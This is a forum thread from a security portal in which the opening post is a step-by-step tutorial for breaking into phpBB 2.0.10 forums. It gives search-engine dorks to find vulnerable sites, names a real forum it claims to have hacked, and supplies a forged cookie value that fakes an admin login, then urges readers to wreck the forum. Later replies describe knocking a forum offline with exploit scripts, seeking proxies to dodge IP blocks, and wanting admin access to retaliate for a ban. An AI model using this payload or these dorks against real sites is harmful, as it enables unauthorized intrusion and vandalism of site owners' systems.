Waraxe IT Security Portal
Login or Register
October 25, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 133
Members: 0
Total: 133
Full disclosure
SEC Consult SA-20241024-0 :: Unauthenticated Path Traversal Vulnerability in Lawo AG - vsm LTC Time Sync (vTimeSync) (CVE-2024-6049)
[RESEARCH] DTLS 'ClientHello' Race Conditions in WebRTCImplementations
Adversary3 updated with 700 malware and C2 panelvulnerabilities
SEC Consult SA-20241015-0 :: Multiple Vulnerabilities in Rittal IoT Interface & CMC III Processing Unit (CVE-2024-47943, CVE-2024-47944, CVE-2024-47945)
CVE-2024-48939: Unauthorized enabling of API in Paxton Net2software
SEC Consult SA-20241009-0 :: Local Privilege Escalation via MSI installer in Palo Alto Networks GlobalProtect (CVE-2024-9473)
APPLE-SA-10-03-2024-1 iOS 18.0.1 and iPadOS 18.0.1
Some SIM / USIM card security (and ecosystem) info
SEC Consult SA-20240930-0 :: Local Privilege Escalation via MSI Installer in Nitro PDF Pro (CVE-2024-35288)
Backdoor.Win32.Benju.a / Unauthenticated Remote CommandExecution
Backdoor.Win32.Prorat.jz / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Amatu.a / Remote Arbitrary File Write (RCE)
Backdoor.Win32.Agent.pw / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Boiling / Remote Command Execution
Defense in depth -- the Microsoft way (part 88): a SINGLEcommand line shows about 20, 000 instances of CWE-73
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> the most easy way to hack phpbb 2.0.10 and lower
Post new topicReply to topic View previous topic :: View next topic
the most easy way to hack phpbb 2.0.10 and lower
PostPosted: Wed Nov 01, 2006 4:18 pm Reply with quote
devildad
Beginner
Beginner
Joined: Nov 01, 2006
Posts: 1




First off you need to things:
FireFox: www.GetFireFox.com
Live HTTP Headers: http://livehttpheaders.mozdev.org/installation.html
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 1:
Find a forum older than 2.0.13
Go to a Search like google.com or msn.com
Type in "Powered by phpBB 2.0.10"
Like so: http://www.google.ca/search?hl=en&q=powered+by+phpbb+2.0.10&btnG=Google+Search&meta=
Now i found: (at the moment i have already "hacked" this one.)
http://www.simcraft.com/phpBB2
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 2:
Open the site you are going to hack in a new window.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 3:
Open "Live HTTP Headers" in Tools
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 4:
Refresh the page (the site you are going to hack)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 5:
Now if you go to "Live HTTP Headers" you will see some text.
Scroll to the top you will see:

------------------------------
Host: simcraft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.Cool Gecko/20050511 Firefox/1.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://simcraft.com/phpBB2/index.php
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230
------------------------------
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 6:
Select the line:
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 7:
Replace "a%3A0%3A%7B%7D" by "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"

also remove "; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230"

and click "Replay..."

It sould look like this:

------------------------------
Host: simcraft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.Cool Gecko/20050511 Firefox/1.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://simcraft.com/phpBB2/index.php
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
------------------------------
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 8:
Click "Replay"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 9:
Now you will see "Go to Administration Panel" at the buttom of the page.

Now, sit down and f**k up the forum.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
__________________________________________________________________
i read this toturial some where may b in this forum <<<<<< i need help i had reached go to admin panel button many forums using this but every time site show login page to login as admin???
how can i find md5 has n admin name ()means fuck forum() using this toturial
______________________all site fucker like to fuck sites _____________
__________________DEVILD@D_____________________________
View user's profile Send private message
PostPosted: Wed Nov 08, 2006 5:35 am Reply with quote
brown_turd
Beginner
Beginner
Joined: Nov 08, 2006
Posts: 3




It brings up the admin link fine, but then it goes to the login form.
Any suggestions?
View user's profile Send private message
PostPosted: Thu Nov 09, 2006 5:44 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




brown_turd wrote:
It brings up the admin link fine, but then it goes to the login form.
Any suggestions?


means the forum already patched up,
find another way in Rolling Eyes

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Thu Nov 09, 2006 6:09 am Reply with quote
brown_turd
Beginner
Beginner
Joined: Nov 08, 2006
Posts: 3




I figured that.....
I was able to bring down the forum for a few hours with some of milworm's Perl scripts, but now my IP range has been blocked so I'll need a proxy for running Perl scripts.

Do such things exist?
(Yes I've searched around but didn't find much)
View user's profile Send private message
PostPosted: Sat Nov 18, 2006 11:09 am Reply with quote
Snake-Bite
Regular user
Regular user
Joined: Nov 18, 2006
Posts: 8




Cool..
Anyone know of any phpBB 2.0.10 forums left?
View user's profile Send private message Visit poster's website
PostPosted: Thu May 10, 2007 4:00 pm Reply with quote
Eekam
Regular user
Regular user
Joined: Apr 25, 2007
Posts: 13
Location: Eesti, Tartu




But my phpbb2.10 has cookie line like this:
Cookie: phpbb2mysql_sid=9d2cd0b4f50d7e40de99a8d09b58ac48; ea1b775a903ddbc1cbf2ccb6100ed9cc=-; phpbb2mysql_sid=4225bae3872bf77d1220d908952c9824
View user's profile Send private message
Stronger search with more legitimate results..
PostPosted: Mon Nov 03, 2008 4:01 am Reply with quote
bundyxc
Beginner
Beginner
Joined: Nov 03, 2008
Posts: 1




Actually, you could make a much stronger Google search that would take an exploitable phpBB index page by using this search..

http://www.google.ca/search?hl=en&q=%22Powered+by+phpBB+2.0.10%22+intitle%3A%3A%3A+Index+inurl%3Aindex.php


Or if you wanted, you could try to hack pages that haven't been hacked yet...

http://www.google.ca/search?hl=en&q=%22Powered+by+phpBB+2.0.10%22+intitle%3A%3A%3A+Index+inurl%3Aindex.php++-hacked+-hack


This looks for a site with the exact phrase "Powered By phpBB 2.0.10", and makes sure that the title says ":: Index" somewhere in it. It also looks to find that the URL has the phrase "index.php", which would show that it's a forum homepage. The second link takes out the hacks.

This search comes up with 650+ vulnerable forums, to date, along with 500+ that are intact and untouched by hackers.
Enjoy!
View user's profile Send private message
forum hack
PostPosted: Thu Sep 03, 2009 4:14 pm Reply with quote
psychobabble
Beginner
Beginner
Joined: Sep 03, 2009
Posts: 1




When I use Live HTTP Headers
I get this:
Cookie: login_popup_closed=1; __utma=231365128.1212723634.1251974478.1251975361.1251983222.3; __utmz=231365128.1251983222.3.3.utmcsr=spiritualistchatroom.forumotion.com|utmccn=(referral)|utmcmd=referral|utmcct=/login.forum; __utmc=231365128

As Im a Complete NOVICE I assume its not a phpbb site?
Could do with a tip as I want to get in as admin to change a few bits as they banned me for being confrontational !
Very Happy
View user's profile Send private message
the most easy way to hack phpbb 2.0.10 and lower
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.035 Seconds